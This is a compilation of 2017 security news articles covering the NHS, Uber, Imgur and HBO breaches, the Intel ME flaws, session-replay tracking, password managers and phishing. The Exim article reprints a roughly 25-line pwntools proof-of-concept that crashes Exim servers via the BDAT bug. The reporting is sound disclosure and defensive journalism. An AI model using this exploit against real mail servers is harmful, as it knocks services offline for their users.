STE WILLIAMS

The UK’s National Health Service will pay white hat hackers up to £20m to protect its IT systems, it announced today.

NHS Digital is looking to make a deal with consultants to create a security operations centre, which it says will ensure the safety of staff and patient data nationwide.

Speaking to The Telegraph, NHS Digital said the contract “will provide access to extra specialist resources during peak periods and enable the team to proactively monitor the web for security threats and emerging vulnerabilities.”

This comes against the backdrop of the Wannacry ransomware attack in May this year, which demonstrated the NHS’ lack of preparedness for dealing with a large attack across several locations at once.

An investigation by the Chartered Institute for IT concluded that it was a lack of accountability and investment which led to the attack, while the National Audit Office said the NHS had failed to respond to early warnings about potential threats, and that the attack “could have been prevented by the NHS following basic IT security best practice”.

The new unit will be initially tasked with protecting the systems proactively, by hunting down vulnerabilities in NHS Digital’s network, then searching for weaknesses in individual hospitals’ cyber defences if necessary.

In another move to improve its effectiveness during major incidents, NHS Digital launched cyber security text alerts for its staff last week. It will be used by cybersecurity response team CareCERT can update staff members during high level attacks. ®

The NHS has pointed out that the “new investment will boost the existing services provided by NHS Digital in this space”.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/27/20m_vaccine_for_nhs_cybersecurity/

There is never a good time to reveal a cyber attack. But with EU’s GDPR looming, the fallout is only going to get harder and more expensive if you wait.

Uber has finally disclosed that the company experienced a cyber breach in 2016 when the personal details of both drivers and customers were hacked by cybercriminals. Apparently, the company also paid a small ransom to have the data destroyed.

Here we go again. Another data breach … another CSO gets the axe and departs for mishandling a major incident which, sadly, is becoming a common trend. 

The big news here is that Uber concealed the data breach, which increased the cyber-risk of both drivers and customers, as well as a loss of trust from investors and governments. The mishandling of credentials for an Amazon Web Services (AWS) account was reportedly behind the data breach, a deficiency that demonstrates that companies really need to adhere to the industry recommendations on securing and protecting privileged credentials.  Not protecting these credentials can lead to major cyber incidents, making the difference between a simple perimeter breach and a cyber catastrophe. Privileged access management (PAM) has long been a major problem and this incident is just another example of a company not managing access and securing the keys to the kingdom. 

According to Forrester Research, approximately 80% of data breaches (registration required) are a result of stolen or compromised privileged credentials making privileged credentials security a must for many industry regulations. Not protecting them exposes companies to compliance failure as well as data breaches like we have now seen with Uber. This data breach also demonstrates the importance of incident handling as a major part of an organization’s cybersecurity policy – and doing it right can change the outcome of many cyber incidents. You cannot wait until it is too late to get your incident response plan in place.    

In the time since this data breach occurred, Uber has experienced a change in CEOs and disclosure of this breach gives Uber CEO Dara Khosrowshahi an opportunity to set things straight and change a perception that has dogged Uber for the past few years surrounding many scandals.

Why now? Why should organizations follow Uber’s poor example of disclosure ASAP?

With the upcoming EU General Data Protection Regulation (GDPR), which goes into enforcement in May 2018, businesses of all sizes, around the world, will face huge financial penalties for failure to disclose data breaches and be required to follow a strict 72-hour breach notification to authorities in the countries impacted. The GDPR replaces the European General Data Protection Directive from 1995 and provides the foundation for companies taking responsibility for protecting European citizens’ private data. 

This means organizations are accountable and responsible for all the information they collect. The more information they gather, the more data they must account for, and therefore the more data they are responsible for. If a data breach occurs, and it is found that adequate security measures were not in place, there are significant penalties and fines: 20 million euros or 4% of annual turnover.  In my rough calculation, if we use Uber’s gross bookings from 2016 of $20 billion (USD), then Uber, in a post May 2018 GDPR, could face possible financial penalties of $800 million, which of course would be much higher than they would be facing by disclosing the data breach today. 

Bottom line: If you are you hiding a major data breach like Uber, you might want to pull an Uber and disclose it ASAP.

Or maybe you have not found the data breach yet. Then you had better get looking immediately before it is too late and you put your entire business (and with it, your reputation) at risk.  I suspect many companies that provide services to EU citizens will need to think hard about keeping major data breaches a secret. We may see more companies, like Uber, face the reality that now is a good time to put out their dirty laundry and survive the tougher cyber regulations looming on the horizon.

Cybersecurity should never be an afterthought. Protecting privileged accounts, especially those that provide access to customer and employee personal data, should be a major priority along with a solid incident response plan and training on how to respond effectively and according to regulations and compliance requirements. Lastly, in today’s threat environment, cybersecurity has to become everyone’s responsibility. We need to empower our employees to be the strongest link because we are all on the front line and we need to ensure that everyone on the front line is educated and protected.   

Related Content:

• Uber Paid Hackers $100K to Conceal 2016 Data Breach
• How to Make a Ransomware Payment – Fast
• We’re Still Not Ready for GDPR? What is Wrong With Us?
• Customers Punish Breached Companies

 

Joseph Carson is a cybersecurity professional and ethical hacker with more than 25 years’ experience in enterprise security specializing in blockchain, endpoint security, network security, application security and virtualization, access controls and privileged account … View Full Bio

Article source: https://www.darkreading.com/risk/time-to-pull-an-uber-and-disclose-your-data-breach-now/a/d-id/1330488?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Here’s a list of sites that for little or no cost give you plenty of ideas for where to find first-rate threat intelligence.

Image Source: BeeBright / Shutterstock.com

Organizations know they need to get serious about threat intelligence, but it’s not always clear where to find credible information. While just about every security industry vendor website offers up information on the latest threats, some are better than others. Here, we ‘ll point out the sites that are the most informative and useful.

We called on Roselle Safran, president of Rosint Labs, to work with us to build a meaningful list. Safran’s extensive experience in cybersecurity includes several years of service in the Executive Office of the President and Department of Homeland Security during the Obama administration.

Safran included some obvious choices from federal government sources, but she also struts her cybergeek sruff by offering up some lesser-known sites that track ransomware and malware. We combined forces with Safran to develop a list that will give novices the threat intelligence amuse-bouche they need while supplying some intel red meat for experienced security pros. 

Go through the list. You’ll find that there are many more than eight sites to choose from:

 

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/8-low-or-no-cost-sources-of-threat-intelligence-------/d/d-id/1330447?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Sysadmins who tend Exim servers have been advised to kick off their working weeks with the joy of patching.

The popular (if relatively low-profile) Internet mail message transfer agent (MTA) advised of flaws in a Black Friday post to its public bugtracker, which as contributor Phil Pennock said in this message came without any prior notice.

The bug tracker post explained that when parsing the BDAT data header, Exim scans for the ‘.’ character to signify the end of an e-mail. BDAT is a server verb associated with the MTA’s ability to handle large attachments in chunks (see RFC 1830, for example).

The advisory included a proof-of-concept (less than 30 lines, below). The poster explained that because a function pointer, receive_getc is not reset, the PoC makes Exim run out of stack and crash.

The announcement for CVE-2017-16944 identified the slip as existing in the “receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89”.

Confirming the bug, Pennock said the developers have a “tentative patch” but it needs to be confirmed.

The workaround in the meantime, he said, is to disable chunking by setting the following flag:

chunking_advertise_hosts=

The empty value after the equal sign turns off the vulnerable function.

According to a November 2017 study by E-Soft, Exim is by far the most popular MTA on the Internet, in use on nearly 57 per cent of MX servers it identified. ®

The proof-of-concept

# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:test@localhost")
r.recvline()
r.sendline("RCPT TO:test@localhost")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'x7f')
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':rn')
r.recvuntil('command')
#raw_input()
r.send('n')
r.interactive()
exit()

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/26/exim_rce_vulnerability/

The world’s self-described “most awesome” collection of images, Imgur, has confessed to leaking 1.7 million user records in 2014.

The company was advised of the breach by HaveIBeenPwned administrator Troy Hunt on November 23, 2017.

Imgur’s chief operating officer Roy Sehgal posted confirmation of the breach. Hunt took to Twitter to say that notice came 25 hours after he notified the company it had a problem.

I want to recognise @imgur‘s exemplary handling of this: that’s 25 hours and 10 mins from my initial email to a press address to them mobilising people over Thanksgiving, assessing the data, beginning password resets and making a public disclosure. Kudos! https://t.co/jV8MDscXLT

— Troy Hunt (@troyhunt) November 25, 2017

This is really where we’re at now: people recognise that data breaches are the new normal and they’re judging organisations not on the fact that they’ve had one, but on how they’ve handled it when its happened https://t.co/zV5YLa8hKQ

— Troy Hunt (@troyhunt) November 25, 2017

Hunt also noted that 60 per cent of the e-mail addresses he examined could already in the HaveIBeenPwned database after being revealed in previous breaches of other sites.

Imgur’s notice said users’ registered e-mail addresses and hashed passwords were leaked, but no personally-identifying information was included. Here’s an excerpt from the company’s statement:

“Early morning on November 24th, we confirmed that approximately 1.7 million Imgur user accounts were compromised in 2014. The compromised account information included only email addresses and passwords. Imgur has never asked for real names, addresses, phone numbers, or other personally-identifying information (“PII”), so the information that was compromised did NOT include such PII.”

The only risk to passwords is that until 2016 Ingur used SHA-256 to encrypt passwords, and that algorithm is susceptible to brute-force attacks. The has therefore required affected users to change their password.

Seghal said the site’s investigation into how the breach occurred is ongoing. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/27/imgur_breach/

What is the world’s most widely-used operating system on new PCs?

Windows?

Guess again.

In all probability, it’s the venerable operating system Minix, running on a shadowy subsystem called the Management Engine (ME) that’s built into all recent Intel computers.

Officially, ME is there to make remote troubleshooting for support engineers easier, including – and this is not a misprint – when the PC is turned off but still plugged into the wall.

But ME’s ubiquity and startling capabilities matter to a growing body of critics worried about the security implications of running what, in effect, is an independent system-within-a-system – the Intel-inside-Intel if you like.

The latest salvo was September’s promise by Russian researchers Maxim Goryachy and Mark Ermolov of Positive Technologies to host a session at next month’s Black Hat Europe event during which they would demo an exploit capable of compromising ME to gain “god mode” control over a PC.

This week Intel put out an urgent security advisory confirming the issue, so it seems the pair weren’t simply talking up their presentation to get bums on seats.

Intel lists four ME vulnerabilities (CVE-2017-5705, CVE-2017-5708, CVE-2017-5711, CVE-2017-5712), affecting a swathe of recent processors running ME Firmware v11.x onwards as well as Server Platform Services v4.0 and TXE v3.0.

Several vulnerable processors are listed – anyone running a computer or server based on a Core, Xeon, Atom, Celeron, or Pentium from the last two years can assume they are affected.

Intel has posted a utility to check for these bugs, but ME firmware fixes will need to come from each hardware maker, which is where things get messier.

For instance, a visit to Dell’s support pages lists fixes for its servers but also shows the words “to be determined” next to 100 or more of the PC systems the company supports.

Users looking for a quick fix shouldn’t hold their breath.

What could an attacker do to an unpatched system?

Intel mentions several possibilities, but an alarming standout is the ability to “load and execute arbitrary code outside the visibility of the user and operating system.”

A lot of admins will find themselves doing a double-take reading this, particularly the idea that something inside a PC can run code without the desktop or server operating system being in charge.

Unhappiness at the way ME bends the rules has been steadily growing – and not just from the tinfoil hat brigade.

The privacy croup EFF described ME as a tiny homunculus computer, complete with its own operating system, processor chip, drivers, network stack and web server.

Then, in August, Google engineer Ronald Minnich mentioned that the search giant was so unsettled by the security risks of ME running its own Minix operating system that it planned to rip out as much of ME as possible from its Linux servers.

Interestingly, Microsoft’s recent secure PC specification made no mention of ME beyond endorsing Intel’s new processor generation.

What is clear is that researchers smell blood and will continue to probe ME and equivalent low-level technologies for weaknesses.

After this week, few will bet against them finding more problems.

Follow @NakedSecurity
Follow @JohnEDunn

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Cxlxc4kQyR0/

The biggest hurdle to catching cybercriminals is usually that they are hard to identify or connect to alleged crimes.

Sometimes, a suspect is identified but nobody knows where they are.

And then there is the rarer but frustrating situation where the authorities are sure they know the identity of an attacker, and where they live, but still can’t apprehend them.

This seems to be the case with Behzad Mesri, alleged by US prosecutors to be behind May’s spectacular attack on HBO that resulted in the leaking of 1.5TB of data, including un-aired episodes of several popular shows, a Games of Thrones script, staff contacts, account credentials, and financial data.

Quite a haul, that reportedly came with a gloating ransom note demanding “our 6-month salary in bitcoin,” equivalent to $6m (£4.5m).

The barrier to arresting Mesri –  who allegedly used the online alias “Skote Vahshat” – is that he lives in Iran, a country the US has notoriously poor relations with, let alone anything resembling an extradition agreement.

If they did somehow nab him, the indictment submitted to the United States District Court in Manhattan suggests he’d be quite a catch.

This claims Mesri is connected to an Iranian hacking group calling itself the Turk Black Hat Security Team, which appears to be well known within Iran.

Says the indictment:

As a member of that group, Mesri conducted undress of website defacements…against websites in the US and elsewhere.

HBO wasn’t his only target, it seems.

He accessed HBO’s content by compromising multiple user accounts, it adds, which at least reduces the troubling possibility that the attack was aided by a malicious insider who is still in place.

Is publicly pursuing a man beyond reach a cry in the dark?

It might appear so until you read that the FBI is so sure it has its man, it has released a photograph of him and added his name to its scary most wanted list.

This is significant. Most countries have something similar, but none has the abstract menace of the FBI’s – being added to it is still a powerful way of signalling that the US will pursue a suspect for as long as it takes to hold them to account.

As acting US attorney Joon H. Kim put it:

The memory of American law enforcement is very long.

Which might suggest that the US thinks that making his status public will act as a deterrent to other hackers, and perhaps even to Iran itself, to hacking conducted from inside Iran’s borders.

Still, there’s a risk that by adding a suspect on the list, this boosts their notoriety and prestige within hacking circles.

The irony is that Mesri’s alleged activities did little apparent harm to HBO’s business, indeed a separate sequence of accidental leaks of show episodes by the company’s business partners was probably more damaging.

The great HBO hack won’t be remembered as another Sony Pictures disaster by any means – but it might come to be viewed as the moment the US decided to demystify hacking by making it personal.

Follow @NakedSecurity
Follow @JohnEDunn

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/kcW4wBG908c/

Next time you visit a popular website imagine that your arrival on the site coincides with the arrival of a film crew at whatever home, office, coffee shop or bus stop you happen to be occupying.

A cameraman erects his tripod and rests the camera’s lens just above your shoulder with such haste that the page you’re visiting hasn’t even finished loading before a lens is locked on to it, greedily inhaling everything that happens on your screen.

Your head and hands are out of shot but every mouse wobble, scroll, click and keystroke is recorded.

You forget he’s there as you browse around, dropping things in and out of your shopping cart but the lens sees and saves everything. You move through the checkout process and get to a page that wants your name, address and credit card details. You fill them in before having a change of heart and deciding, no, you don’t need another pair of khakis. You don’t hit ‘submit’.

As the data sits unsent on your screen the cameraman reaches across, unrolls a short length of sticky tape, slaps it over your credit card number and then films everything you decided not to share.

As he flashes you a look that tells you exactly how clever he thinks he was for covering up that credit number you notice that your name, address, email, CVV and credit card expiry date didn’t get any tape. Come to think of it, you can’t remember him doing that to your password when you logged in earlier either.

Of course that story isn’t true, it all happens without a cameraman.

The eye of Sauron

It happens because of JavaScript, a programming language that can be embedded in web pages and which, more than any other technology, turns the World Wide Web from a collection of documents into a collection of interactive apps.

Its very old, featureful and well-established tool bag bulges with such useful things as: the clientX and clientY properties that capture the exact location of your cursor at any moment; the onkeypress event that coughs up whatever keys you’ve pressed; the value property that holds the contents of input fields; as well as countless other objects, properties and events that give websites access to everything from your physical location to the amount of battery charge in your laptop.

JavaScript’s features can be woven together to make everything from live chat clients and games to cryptocurrency miners and session replay scripts that record every single thing you do on a website.

Session replay scripts act just like a silent cameraman, recording aspects of your visit like how long you spend on each page, where your mouse goes and what you type, so that it can be played back like a movie by the site’s owner.

They exist to help website owners improve their sites by observing how users engage with them.

But how many users realise that this is even possible, that so much data is being gathered, that their choice to click “submit” or not doesn’t matter and that all the data that’s harvested is under the care of third-party tracking companies?

A recent study by researchers at Princeton University called No boundaries: Exfiltration of personal data by session-replay scripts revealed the extent to which session replay code is used on popular websites, and highlighted a number of serious privacy concerns that occur as a consequence.

Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third-party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behavior. The same is true for the collection of user inputs during checkout and registration processes.

Using a fairly conservative methodology the researchers looked for evidence of recording by seven of the top session replay companies: Yandex, FullStory, Hotjar, UserReplay, Smartlook, Clicktale, and SessionCam.

They were found on 482 of the top 50,000 sites, on domains as interesting as hp.com, intel.com, comcast.net, lenovo.com, costco.com and gap.com. Alongside their writeup the researchers have made a full list of the sites available.

The researchers identified three serious issues:

Failure to redact passwords

The research notes that all the services that were monitored took steps to prevent the accidental capture of passwords by excluding HTML password input fields. The trouble is that doesn’t always work (my emphasis):

…mobile-friendly login boxes that use text inputs to store unmasked passwords are not redacted by this rule, unless the publisher manually adds redaction tags to exclude them. We found at least one website where the password entered into a registration form leaked to SessionCam, even if the form is never submitted.

Failure to redact sensitive data

The replay scripts all take steps to automatically exclude the sensitive data you use when logging in, searching or making purchases, and provide tools for site owners to configure it for themselves. That’s laudable but, like all the best plans, it doesn’t survive contact with real life.

Four of the six tracking systems – FullStory, Hotjar, Yandex and Smartlook – will happily suck up your name, email address, phone number, address, date of birth and social security number if they fall into their maw. Hotjar and Yandex extend that laissez faire attitude to your credit card’s CVV number and expiry date.

The automatic redaction rules that do exist, to exclude things like passwords and credit card numbers, rely on websites to do their data capture in the same, predictable ways. They do not, which leads to cases like this (my emphasis):

FullStory redacts credit card fields with the `autocomplete` attribute set to `cc-number`, but will collect any credit card numbers included in forms without this attribute.

Automatic redaction also only applies to one type of data gathering done by replay scripts.

Alongside the data captured by monitoring key strokes or the contents of input fields, the scripts also capture “rendered page content” (screen grabs). Automatically redacting information that appears in screen grabs is hard (my emphasis):

…none of the companies appear to provide automated redaction of displayed content by default; all displayed content in our tests ended up leaking.

Instead, session recording companies expect sites to manually label all personally identifying information included in a rendered page.

That’s right, it’s up to individual sites to make sure your data isn’t hoovered up by the all-seeing, all-screen-grabbing eye of Sauron. And that, dear reader, means you cannot rely on it happening.

Why? Because the path most often taken in software development is the path of least resistance. In this case that path leads to your data being hoovered up in screen grabs of the websites you’re visiting.

For it to not happen, this has to happen:

…a site’s web application developers would need to work with the site’s marketing and analytics teams to iteratively scrub personally identifying information from recordings as it’s discovered. Any [small] change to the site design … requires a review of the redaction rules.

Not. Going. To. Happen.

Your data leaks during recording and playback

So far we’ve only concerned ourselves with the actual snagging of your data, but that’s just half the story. Once it’s been gobbled up your data has to be shunted somewhere else, stored and then made available for playback.

These days it’s more common than not to move data, any data, around the web using HTTPS, the secure and encrypted form of HTTP. It protects against MitM (Man-in-the-Middle) attacks that can steal or change your data, and it provides a degree of assurance that data is being sent to where it’s supposed to go.

Since the data captured by replay scripts could potentially contain passwords, credit card numbers, social security numbers, dates of birth, medical data or other highly sensitive, personal information, we’d expect HTTPS to be used when your data is sent to the third party recording services’ websites…

Yandex and Hotjar deliver the publisher page content over HTTP — data that was previously protected by HTTPS is now vulnerable to passive network surveillance.

…and when it’s played back to the site owner.

The publisher dashboards for Yandex, Hotjar, and Smartlook all deliver playbacks within an HTTP page, even for recordings which take place on HTTPS pages.

What to do?

Session recording is a complex business so it’s normally carried out by third party services. Those third party services can be disrupted in the same way that you might disrupt other forms of unwanted online tracking or analytics, by using third-party browser plugins like Ghostery or Privacy Badger.

The research also shows the hopeless, toothless, pointlessness of the not-quite-dead-yet DNT (Do Not Track) proposal that hopes to get websites to behave themselves by asking them nicely (my emphasis):

At least one of the five companies we studied (UserReplay) allows publishers to disable data collection from users who have Do Not Track (DNT) set in their browsers. We scanned the configuration settings of the Alexa top 1 million publishers using UserReplay on their homepages, and found that none of them chose to honor the DNT signal.

Disrupting known, third-party scripts only goes so far though. Developing a full session recording and playback capability is too big a job for most websites but using some of its techniques – such as tracking mouse movements or key strokes – isn’t very difficult at all (and it never has been).

Short of reading each website’s source code and forming a judgement about the intentions of its developers, there’s nothing you can do about that.

GDPR

It’s just possible that the tide is about to turn on services like this though.

In May 2018 Europe’s new rules dealing with how data is collected, stored, accessed and used; how users are told about those things; and what happens if you fail to do them, will come into effect.

What’s got everyone’s attention about the General Data Protection Regulation (GDPR) though is the size of the punch it packs. Firms that fall foul of the new rules could face fines of up to €20m (about $24m) or 4% of global annual turnover, whichever is bigger.

Storing the wrong data in the wrong way is about to become very expensive, making certain types of data much more of a liability and much less of an asset.

When we asked Sophos’s own Senior Cybersecurity Director, Ross McKerchar, in October for his cybersecurity predictions for the next six months, it was top of his list:

I expect to spend a lot of time in the next 6 months deleting unnecessary data and generally being very careful about what we store and where. It’s a defence in depth measure – the less you store the less you have to lose.

Let’s hope he’s not the only one.

If you want to know more about the problems of session replay tracking read the original research.

Follow @NakedSecurity
Follow @MarkStockley

Image of 2015 NASM “Violent Universe”: Jeremy Schnittman courtesy of Flickr user goddard studio 13 under Creative Commons license.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/OudfJPGw00E/

Any time we discuss password managers, the ensuing commentary can sometimes get a little heated. People really love their password managers (and we love to hear that!)

One of the biggest, if not THE biggest, point of contention, however, is the cloud. Specifically, the cloud as a place to store your password vault, the cache of your credentials that your password manager absolutely needs to keep safe at all costs.

This is a clear dividing line for many password manager aficionados. Do you trust third-party cloud storage as a place to store your vault – dozens upon dozens, if not hundreds of credentials – or do you choose to keep your vault in places that are exclusively owned and maintained by you?

Let’s break it down.

Arguments for the Cloud

Synchronisation across devices

If you use credentials across multiple browsers, devices and locations, the ability to keep all that data in one central location means that, no matter the device you are on, you know you are always using the most up-to-date credentials.

There’s no work needed in version-managing a password vault file, as there’s only one vault and it’s always current. If you change your password using one device, the moment you access that service on another device your credentials have already been synced.

Yes, there’s encryption

The encryption measures used to secure password vaults in the cloud can get an unfair rap. Most cloud-based password managers encrypt your password data on your device, before it gets sent anywhere on the internet, and that encrypted data is sent to and from cloud storage using an encrypted connection.

For many of the services I’ve looked into, the keys to encrypt and decrypt your password data are generated and kept locally on your device and never touch the internet at all.

This should me that you, and only you, can decrypt your passwords. The makers of the password manager can’t read your passwords and if their cloud storage is breached – which, while unlikely, has happened in the past – the treasure trove of encrypted password vaults it contains is useless without the individual keys to unlock each and every vault. There’s nothing the crooks can do, and no data can be extracted, without your keys.

(The time it would take to decrypt just one of these vaults with even the most advanced tech we have now would measure, conservatively, in many multiples of the age of the Universe. I know your Facebook password is valuable, but it’s not that valuable.)

Ease of use for the non-technical

This might not seem like a big deal for those of you who don’t mind a few rough edges, but you can’t discount the impact of good usability and design. Many of the cloud-based password managers are proprietary software designed to make money for their creators (so that’s a plus or minus depending on how you feel), which means they have budget for things like design expertise, user testing, and customer support.

They try to make their tools as easy to understand and as easy to use as possible. You don’t have to be a security nerd, or even a security neophyte, to get up and running. The tools work and work quite well.

Arguments against the cloud

Trusting a third party

For many people, the idea of handing over private credentials to a third party is sacrilege. These credentials are the keys to your kingdom – your finances, your social life, your email, everything – and you’re handing them over to another company.

That company (and everyone in it) might have your best interests in mind but the danger of the so-called “insider threat” is real, software has vulnerabilities and companies make mistakes, so you’d be sensible to behave as if they don’t.

Your passwords move through a chain of infrastructure that encrypts your data and connects your devices to the cloud, and you are relying on all of that to be well maintained and free from security vulnerabilities. As I mentioned above, cloud-based password managers like LastPass have had some security troubles in the past (since fixed), including some nasty flaws in its two-factor authentication protocols.

All eggs in one big basket

While some people are just philosophically opposed to entrusting their information to anyone else, no matter what level of encryption is used, others see cloud-based password storage as a single point of failure.

That concern is only multiplied by the idea of putting your entire password vault out of reach, in a place that you don’t own and can’t directly configure or control. You could take every possible precaution to secure your account but ultimately, keeping your passwords safe relies on the encryption employed by cloud-based password managers that I mentioned earlier working as advertised.

Needless to say, password vaults stored en masse by vendors are a much bigger target, offering a much bigger potential pay off for criminal hackers, than just a single password vault stored by one person.

Cost

Sometimes the features you really want in a third-party password manager come with a price, either one-time or subscription based. Generally, these are for features and not the base password manager itself, though if your budget is zero any cost is prohibitive.

Decisions, decisions…

If you find yourself leaning towards keeping your data close to your chest, a password manager that gives you full control over where you store your password vault, like KeePass, is likely the best fit for you.

If you find the convenience of cloud solutions to be more your style, a cloud-based password manager may be more your speed. Many NakedSecurity readers have commented that LastPass and 1Password are their choices for cloud-based password managers, but there are many many others in the market, including Google’s Smart Lock and Apple’s iCloud Keychain. Sophos’s mobile security apps Sophos Mobile Security and Sophos Secure Workspace can both use local KeePass vaults, and Sophos Secure Workspace can work with multiple local or cloud-based vaults.

If you’re not sure where you fall on this debate, you’re not the only one. There’s something to be said for healthy skepticism about either “side,” especially if someone declares that something is the best solution for everyone in every situation.

As with most decisions around what’s best for your privacy and security, there are a number of risk/reward calculations that you need to make to determine what’s right for you.

Follow @mvarmazis
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qnqAqdOiA4Y/

We’re entering peak retail season.

Black Friday, Cyber Monday, Hanukkah, Kwanzaa, Christmas, Boxing Day, the New Year Sales – it’s the start of a long season of giving and receiving, buying and selling, visiting shops and going online to shop around.

You’re likely to be looking for things you don’t buy every day, from retailers you don’t deal with every day.

So, even if you’re shopping in-store, you can expect plenty of online action via SMS, web and email – invoices, receipts, confirmations, deliveries, acknowledgements…

…and that’s just for the things you’ve already bought.

On top of all that, you’ll get any number of special offers, solicited and unsolicited, expected and unexpected, genuine and scammy.

We know that the majority of Naked Security readers are strongly interested in IT and computer security, as well as partly or fully responsible for security at work or at home (or, more likely, both).

So, even if you could spot a phish at 100 paces, what about your friends, family and colleagues?

We thought it might help if we put together a brief “story in pictures” to help you do the explaining.

Here goes.

Down memory lane

Here’s a phish from a few years ago, when the crooks first realised that getting your email password was as good as getting your banking credentials – or perhaps even better, given that your email password is often the key to resetting the passwords on dozens of other accounts:

Although you’ll still see phishes like this, by today’s standards it is rather obviously suspicious – in slang terms, you might call it “amateur-time”.

Nothing about it quite adds up – it has an unprofessional look, uses colours that Outlook.com doesn’t, mentions a mail limit that’s completely different from real life, and is written in illiterate, mis-spelled English.

Unfortunately, you can’t rely on every crook being this slapdash, so you will often see phishes that are much more believable – technically and visually.

In other words: “it looks like garbage” is a good rule for getting rid of spams and scams, but “it looks OK” is not good enough on its own for accepting an email or a web page.

KISS

Some crooks have realised that the shorter, sweeter and simpler you keep an attack, the easier it is to pass muster, like this SMS scam campaign from Australia:

See what they did there?

SMSes are so short that it’s easy to produce a grammatically correct message, especially if all the message says is, “You have a message.”

Worse still, SMSes, like tweets, often contain shortened web links to save space, making it easier for the crooks to pass off a rotten domain as a safe-looking one.

Don’t be in a hurry to click, especially if the message claims to relate to a service you already use.

After all, if your bank sends you a message about a message, you don’t need a link because you already know how to get to the right page on your banking website by yourself.

Good looks

Sometimes, crooks go to a bit more effort than the Outlook.com example we showed above.

Here are some recent examples from our spamtraps where the crooks have “borrowed” the icons and visual flavour one of the world’s most popular computer brands, Apple:

Fortunately, even these crooks haven’t taken as much care as they could have, but if you’re in a hurry, or aren’t a native speaker of English, these messages look likely enough.

But let’s not rush into it – let’s try what Staysafeonline.org suggests: Stop. Think. Connect.

Try this logic for size:

• If these messages are true, you don’t need to click – you can just head over to Apple’s website manually, or open the AppStore app yourself.
• If the messages are not true, you don’t want to click, for obvious reasons.
• Therefore, true or false, your best action is not to click.

Easy, isn’t it? Don’t click!

Click to cancel

Some crooks take a more subtle approach than threatening you with a generic problem with your whole account.

Instead, the crooks pretend to have processed a specific transaction, often for a fairly modest amount (but not so small that you’re likely to ignore it)…

…and below the invoice, they helpfully provide a button to dispute or to cancel the transaction if you think it’s fraudulent.

It’s tempting to take a look “just in case”, especially if you have recently bought items via Apple and wonder if this might be one you forgot about, or if you’re worried that your kids have been spending your money in the AppStore behind your back.

Don’t do it!

Don’t click through “just in case”, even if the purchase is the same as or similar to one you did make.

Popular advice says to hover over the link you’re about to click, thus popping up a box that shows where you’re about to go, to help you check in advance whether you’re heading to a real site like apple.com or an imposter that’s nothing to do with Apple.

We have a simpler approach: ignore all the links entirely in any email like this is, for exactly the reasons we’ve discussed above.

If the transaction is real, you will find it by logging into your Apple account without any email help, so there’s no point in clicking.

If the transaction is fake, there’s no point in clicking.

If in doubt…

To leave you with some short and simple messages you can give to your friends and family this holiday season:

1. For personal information. If in doubt, don’t give it out.
2. For web links. If in doubt, don’t connect out.
3. For website forms. If in doubt, don’t fill it out.

TL;DR – IF IN DOUBT…DON’T.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/ScfkRGUoIJY/